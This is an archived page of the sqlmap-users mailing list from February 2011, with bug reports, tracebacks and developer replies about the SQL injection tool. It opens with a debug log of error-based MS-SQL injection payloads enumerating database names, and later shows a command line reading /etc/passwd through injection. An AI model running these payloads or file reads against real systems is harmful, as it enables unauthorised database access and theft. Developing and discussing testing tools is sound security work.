(Internal Server Error) [09:55:57] [PAYLOAD] 20111' AND 67=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 28 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'STKX'='STKX [09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:57] [PAYLOAD] 20111' AND 4438=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 29 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'aijp'='aijp [09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:57] [PAYLOAD] 20111' AND 8472=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 30 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'MmKf'='MmKf [09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:57] [PAYLOAD] 20111' AND 7560=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 31 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'uqfx'='uqfx [09:55:58] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:58] [PAYLOAD] 20111' AND 3694=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 32 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'Okbd'='Okbd [09:55:58] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:58] [PAYLOAD] 20111' AND 6264=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 33 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'kCDT'='kCDT [09:56:00] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:56:00] [PAYLOAD] 20111' AND 9947=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 34 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'Hspk'='Hspk [09:56:00] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:56:00] [PAYLOAD] 20111' AND 4734=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 35 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'BNER'='BNER [09:56:01] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:56:01] [PAYLOAD] 20111' AND 703=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 36 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'MPbC'='MPbC [09:56:02] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:56:02] [DEBUG] performed 38 queries in 16 seconds available databases [37]: [09:56:02] [WARNING] HTTP error codes detected during testing: 500 (Internal Server Error) - 62 times [09:56:02] [INFO] Fetched data logged to text files under '/path/sqlmap-dev/output/www.vuln.com' [*] shutting down at: 09:56:02 David |
|
From: Miroslav S. <mir...@gm...> - 2011-02-09 10:52:49
|
just to warn you all. it will try to enumerate tables by this way and if it fails it will failback to the normal "brute" force way. this will be the case in major percentage of cases. kr On Wed, Feb 9, 2011 at 11:49 AM, Miroslav Stampar <mir...@gm...> wrote: > done. > > find it implemented in latest revision (r3287). > > kr > > On Tue, Feb 8, 2011 at 5:35 PM, Miroslav Stampar > <mir...@gm...> wrote: >> we'll try to implement it in next few days >> >> kr >> >> On Mon, Feb 7, 2011 at 2:07 PM, Stiefenhofer, Marek >> <M.S...@r-...> wrote: >>> Hi all, >>> >>> >>> >>> in some rare cases default permissions on Access Databases have been >>> modified, allowing at least read access for the default user to the system >>> table: MSysObjects. >>> >>> In those cases it is easy to get the tablenames like that: >>> >>> >>> >>> SELECT MSysObjects.Name FROM MSysObjects WHERE MSysObjects.Type=1 >>> >>> >>> >>> Is it worth to include this before the bruteforce tests that SQLmap is >>> doing? Nevertheless there’s no way to enumerate column names… >>> >>> >>> >>> -marek >>> >>> ------------------------------------------------------------------------------ >>> The modern datacenter depends on network connectivity to access resources >>> and provide services. The best practices for maximizing a physical server's >>> connectivity to a physical network are well understood - see how these >>> rules translate into the virtual world? >>> http://p.sf.net/sfu/oracle-sfdevnlfb >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> >> >> -- >> Miroslav Stampar >> >> E-mail: miroslav.stampar (at) gmail.com >> Alternate: miroslav.stampar (at) mail.ru >> PGP Key ID: 0xB5397B1B >> Location: Zagreb, Croatia >> > > > > -- > Miroslav Stampar > > E-mail: miroslav.stampar (at) gmail.com > Alternate: miroslav.stampar (at) mail.ru > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com Alternate: miroslav.stampar (at) mail.ru PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2011-02-09 10:49:35
|
done. find it implemented in latest revision (r3287). kr On Tue, Feb 8, 2011 at 5:35 PM, Miroslav Stampar <mir...@gm...> wrote: > we'll try to implement it in next few days > > kr > > On Mon, Feb 7, 2011 at 2:07 PM, Stiefenhofer, Marek > <M.S...@r-...> wrote: >> Hi all, >> >> >> >> in some rare cases default permissions on Access Databases have been >> modified, allowing at least read access for the default user to the system >> table: MSysObjects. >> >> In those cases it is easy to get the tablenames like that: >> >> >> >> SELECT MSysObjects.Name FROM MSysObjects WHERE MSysObjects.Type=1 >> >> >> >> Is it worth to include this before the bruteforce tests that SQLmap is >> doing? Nevertheless there’s no way to enumerate column names… >> >> >> >> -marek >> >> ------------------------------------------------------------------------------ >> The modern datacenter depends on network connectivity to access resources >> and provide services. The best practices for maximizing a physical server's >> connectivity to a physical network are well understood - see how these >> rules translate into the virtual world? >> http://p.sf.net/sfu/oracle-sfdevnlfb >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > > -- > Miroslav Stampar > > E-mail: miroslav.stampar (at) gmail.com > Alternate: miroslav.stampar (at) mail.ru > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com Alternate: miroslav.stampar (at) mail.ru PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2011-02-09 09:50:53
|
hi Johan thx for you report. find it fixed in the latest commit. kr On Wed, Feb 9, 2011 at 9:21 AM, Johan Flote Rosén <flo...@gm...> wrote: > it turned out ok the second time around, but I just thought i'd share it > anyways. > [09:18:20] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run > with the latest development version from the Subversion repository. If the > exception persists, please send by e-mail to > sql...@li... the following text and any information > required to reproduce the bug. The developers will try to reproduce the bug, > fix it accordingly and get back to you. > sqlmap version: 0.9-dev (r3284) > Python version: 2.6.1 > Operating system: posix > Command line: ./sqlmap.py -u > ****************************************************** -f -b --current-user > --current-db --users --passwords --dbs -v 1 > Technique: ERROR > Back-end DBMS: MySQL (fingerprinted) > Traceback (most recent call last): > File "./sqlmap.py", line 82, in main > start() > File "/Users/flote/sqlmap-dev/lib/controller/controller.py", line 414, in > start > action() > File "/Users/flote/sqlmap-dev/lib/controller/action.py", line 77, in > action > conf.dbmsHandler.getPasswordHashes(), "password hash") > File "/Users/flote/sqlmap-dev/plugins/generic/enumeration.py", line 238, > in getPasswordHashes > for user, password in value: > ValueError: need more than 0 values to unpack > > ------------------------------------------------------------------------------ > The ultimate all-in-one performance toolkit: Intel(R) Parallel Studio XE: > Pinpoint memory and threading errors before they happen. > Find and fix more than 250 security defects in the development cycle. > Locate bottlenecks in serial and parallel code that limit performance. > http://p.sf.net/sfu/intel-dev2devfeb > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com Alternate: miroslav.stampar (at) mail.ru PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Johan F. R. <flo...@gm...> - 2011-02-09 08:21:49
|
it turned out ok the second time around, but I just thought i'd share it
anyways.
[09:18:20] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run
with the latest development version from the Subversion repository. If the
exception persists, please send by e-mail to
sql...@li... the following text and any information
required to reproduce the bug. The developers will try to reproduce the bug,
fix it accordingly and get back to you.
sqlmap version: 0.9-dev (r3284)
Python version: 2.6.1
Operating system: posix
Command line: ./sqlmap.py -u
****************************************************** -f -b --current-user
--current-db --users --passwords --dbs -v 1
Technique: ERROR
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
File "./sqlmap.py", line 82, in main
start()
File "/Users/flote/sqlmap-dev/lib/controller/controller.py", line 414, in
start
action()
File "/Users/flote/sqlmap-dev/lib/controller/action.py", line 77, in
action
conf.dbmsHandler.getPasswordHashes(), "password hash")
File "/Users/flote/sqlmap-dev/plugins/generic/enumeration.py", line 238,
in getPasswordHashes
for user, password in value:
ValueError: need more than 0 values to unpack
|
|
From: Miroslav S. <mir...@gm...> - 2011-02-08 22:10:40
|
aha, now i see: "sqlmap say me "the parameter par 1 is not dynamic" and shutdown" you are using 0.8 right? please update to the latest version (0.9/dev) from our repository: svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev we've fixed some minor stuff till then :) kr On Tue, Feb 8, 2011 at 10:55 PM, Miroslav Stampar <mir...@gm...> wrote: > ..and why are you stunned ciccio? > > On Tue, Feb 8, 2011 at 10:54 PM, Miroslav Stampar > <mir...@gm...> wrote: >> have you tried different levels (--level)? >> >> have you tried different risks (--risk)? >> >> in plainspeak: >> higher level = more techniques >> higher risk = more prefix/postfix combinations >> >> kr >> >> On Tue, Feb 8, 2011 at 10:50 PM, ciccio panzino >> <cic...@gm...> wrote: >>> Hi, I've tested manually several sites which give me typical ODBC >>> MS-SQL syntax error with simple tick inserted in the POST login >>> parameters. Again when I perform different payloads like "union select >>> blabla" the error message change and show me I'm interact effectively >>> with the db. >>> BUT if I perform a simple test with sqlmap -u www.foo.bar/login.asp >>> --method=post --data=par1=val1&par2=val2 -p par1 it say me par1 is not >>> injectable (while manually it is). Why sqlmap doesn't see the vuln? >>> Where I wrong? >>> Again if in the data option i put a normal value for par1 (like asdf), >>> sqlmap say me "the parameter par 1 is not dynamic" and shutdown, while >>> if I put directly a tick after asdf value in the data option, sqlmap >>> see it like "dynamic" and start the tests (with "not injectable" >>> response at the end) >>> help plz >>> thks >>> mariuolo >>> >>> ------------------------------------------------------------------------------ >>> The ultimate all-in-one performance toolkit: Intel(R) Parallel Studio XE: >>> Pinpoint memory and threading errors before they happen. >>> Find and fix more than 250 security defects in the development cycle. >>> Locate bottlenecks in serial and parallel code that limit performance. >>> http://p.sf.net/sfu/intel-dev2devfeb >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >> >> >> >> -- >> Miroslav Stampar >> >> E-mail: miroslav.stampar (at) gmail.com >> Alternate: miroslav.stampar (at) mail.ru >> PGP Key ID: 0xB5397B1B >> Location: Zagreb, Croatia >> > > > > -- > Miroslav Stampar > > E-mail: miroslav.stampar (at) gmail.com > Alternate: miroslav.stampar (at) mail.ru > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com Alternate: miroslav.stampar (at) mail.ru PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2011-02-08 21:55:11
|
..and why are you stunned ciccio? On Tue, Feb 8, 2011 at 10:54 PM, Miroslav Stampar <mir...@gm...> wrote: > have you tried different levels (--level)? > > have you tried different risks (--risk)? > > in plainspeak: > higher level = more techniques > higher risk = more prefix/postfix combinations > > kr > > On Tue, Feb 8, 2011 at 10:50 PM, ciccio panzino > <cic...@gm...> wrote: >> Hi, I've tested manually several sites which give me typical ODBC >> MS-SQL syntax error with simple tick inserted in the POST login >> parameters. Again when I perform different payloads like "union select >> blabla" the error message change and show me I'm interact effectively >> with the db. >> BUT if I perform a simple test with sqlmap -u www.foo.bar/login.asp >> --method=post --data=par1=val1&par2=val2 -p par1 it say me par1 is not >> injectable (while manually it is). Why sqlmap doesn't see the vuln? >> Where I wrong? >> Again if in the data option i put a normal value for par1 (like asdf), >> sqlmap say me "the parameter par 1 is not dynamic" and shutdown, while >> if I put directly a tick after asdf value in the data option, sqlmap >> see it like "dynamic" and start the tests (with "not injectable" >> response at the end) >> help plz >> thks >> mariuolo >> >> ------------------------------------------------------------------------------ >> The ultimate all-in-one performance toolkit: Intel(R) Parallel Studio XE: >> Pinpoint memory and threading errors before they happen. >> Find and fix more than 250 security defects in the development cycle. >> Locate bottlenecks in serial and parallel code that limit performance. >> http://p.sf.net/sfu/intel-dev2devfeb >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Miroslav Stampar > > E-mail: miroslav.stampar (at) gmail.com > Alternate: miroslav.stampar (at) mail.ru > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com Alternate: miroslav.stampar (at) mail.ru PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2011-02-08 21:54:43
|
have you tried different levels (--level)? have you tried different risks (--risk)? in plainspeak: higher level = more techniques higher risk = more prefix/postfix combinations kr On Tue, Feb 8, 2011 at 10:50 PM, ciccio panzino <cic...@gm...> wrote: > Hi, I've tested manually several sites which give me typical ODBC > MS-SQL syntax error with simple tick inserted in the POST login > parameters. Again when I perform different payloads like "union select > blabla" the error message change and show me I'm interact effectively > with the db. > BUT if I perform a simple test with sqlmap -u www.foo.bar/login.asp > --method=post --data=par1=val1&par2=val2 -p par1 it say me par1 is not > injectable (while manually it is). Why sqlmap doesn't see the vuln? > Where I wrong? > Again if in the data option i put a normal value for par1 (like asdf), > sqlmap say me "the parameter par 1 is not dynamic" and shutdown, while > if I put directly a tick after asdf value in the data option, sqlmap > see it like "dynamic" and start the tests (with "not injectable" > response at the end) > help plz > thks > mariuolo > > ------------------------------------------------------------------------------ > The ultimate all-in-one performance toolkit: Intel(R) Parallel Studio XE: > Pinpoint memory and threading errors before they happen. > Find and fix more than 250 security defects in the development cycle. > Locate bottlenecks in serial and parallel code that limit performance. > http://p.sf.net/sfu/intel-dev2devfeb > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com Alternate: miroslav.stampar (at) mail.ru PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: ciccio p. <cic...@gm...> - 2011-02-08 21:50:16
|
Hi, I've tested manually several sites which give me typical ODBC MS-SQL syntax error with simple tick inserted in the POST login parameters. Again when I perform different payloads like "union select blabla" the error message change and show me I'm interact effectively with the db. BUT if I perform a simple test with sqlmap -u www.foo.bar/login.asp --method=post --data=par1=val1&par2=val2 -p par1 it say me par1 is not injectable (while manually it is). Why sqlmap doesn't see the vuln? Where I wrong? Again if in the data option i put a normal value for par1 (like asdf), sqlmap say me "the parameter par 1 is not dynamic" and shutdown, while if I put directly a tick after asdf value in the data option, sqlmap see it like "dynamic" and start the tests (with "not injectable" response at the end) help plz thks mariuolo |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-02-08 17:02:16
|
Hi yonny, On 6 February 2011 15:21, Bernardo Damele A. G. <ber...@gm...> wrote: > ... >> conf.dumper.rFile(conf.rFile, conf.dbmsHandler.readFile(conf.rFile)) >> File "/pentest/database/sqlmap/plugins/generic/filesystem.py", line 285, >> in readFile >> newFileContent += chunk >> TypeError: cannot concatenate 'str' and 'NoneType' objects > > We have been reported this bug since 24 hours by another user. We are > on the case. If you svn update, you'll see that the exception is > handled correctly now, no traceback anymore. > Support to read files on MySQL via error-based though will come as > soon as we fix an important bug related to MySQL trimming of output in > error-based payloads. We have done the fix and re-enabled file retrieval via SQL injection techniques on MySQL one. Cheers, Bernardo -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: Miroslav S. <mir...@gm...> - 2011-02-08 16:35:16
|
we'll try to implement it in next few days kr On Mon, Feb 7, 2011 at 2:07 PM, Stiefenhofer, Marek <M.S...@r-...> wrote: > Hi all, > > > > in some rare cases default permissions on Access Databases have been > modified, allowing at least read access for the default user to the system > table: MSysObjects. > > In those cases it is easy to get the tablenames like that: > > > > SELECT MSysObjects.Name FROM MSysObjects WHERE MSysObjects.Type=1 > > > > Is it worth to include this before the bruteforce tests that SQLmap is > doing? Nevertheless there’s no way to enumerate column names… > > > > -marek > > ------------------------------------------------------------------------------ > The modern datacenter depends on network connectivity to access resources > and provide services. The best practices for maximizing a physical server's > connectivity to a physical network are well understood - see how these > rules translate into the virtual world? > http://p.sf.net/sfu/oracle-sfdevnlfb > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com Alternate: miroslav.stampar (at) mail.ru PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2011-02-07 13:44:53
|
ok. we'll consider it. i'll do some testings in the "wild" to see what's the percentage of those when get time. if the percentage is "considerable" we can include it, for sure. kr On Mon, Feb 7, 2011 at 2:07 PM, Stiefenhofer, Marek <M.S...@r-...> wrote: > Hi all, > > > > in some rare cases default permissions on Access Databases have been > modified, allowing at least read access for the default user to the system > table: MSysObjects. > > In those cases it is easy to get the tablenames like that: > > > > SELECT MSysObjects.Name FROM MSysObjects WHERE MSysObjects.Type=1 > > > > Is it worth to include this before the bruteforce tests that SQLmap is > doing? Nevertheless there’s no way to enumerate column names… > > > > -marek > > ------------------------------------------------------------------------------ > The modern datacenter depends on network connectivity to access resources > and provide services. The best practices for maximizing a physical server's > connectivity to a physical network are well understood - see how these > rules translate into the virtual world? > http://p.sf.net/sfu/oracle-sfdevnlfb > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com Alternate: miroslav.stampar (at) mail.ru PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Stiefenhofer, M. <M.S...@r-...> - 2011-02-07 13:42:12
|
Hi all, in some rare cases default permissions on Access Databases have been modified, allowing at least read access for the default user to the system table: MSysObjects. In those cases it is easy to get the tablenames like that: SELECT MSysObjects.Name FROM MSysObjects WHERE MSysObjects.Type=1 Is it worth to include this before the bruteforce tests that SQLmap is doing? Nevertheless there's no way to enumerate column names... -marek |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-02-06 15:21:46
|
Hi yonny. On 6 February 2011 14:44, yonny mutai <yo...@go...> wrote: > ... > Command line: /pentest/database/sqlmap/sqlmap.py --level 5 --risk 3 > --parse-errors --msf-path /pentest/exploits/framework3 --read-file > /etc/passwd --time-sec 10 --method=POST --data=user_name=loan&password=2121 > --threads 1 --timeout 39 -u ********************************************** > --dbms mysql --flush-session > Technique: ERROR > Back-end DBMS: MySQL (fingerprinted) > Traceback (most recent call last): > File "/pentest/database/sqlmap/sqlmap.py", line 82, in main > start() > File "/pentest/database/sqlmap/lib/controller/controller.py", line 414, in > start > action() > File "/pentest/database/sqlmap/lib/controller/action.py", line 123, in > action > conf.dumper.rFile(conf.rFile, conf.dbmsHandler.readFile(conf.rFile)) > File "/pentest/database/sqlmap/plugins/generic/filesystem.py", line 285, > in readFile > newFileContent += chunk > TypeError: cannot concatenate 'str' and 'NoneType' objects We have been reported this bug since 24 hours by another user. We are on the case. If you svn update, you'll see that the exception is handled correctly now, no traceback anymore. Support to read files on MySQL via error-based though will come as soon as we fix an important bug related to MySQL trimming of output in error-based payloads. Thanks for reporting. Cheers, -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
48 messages has been excluded from this view by a project administrator.
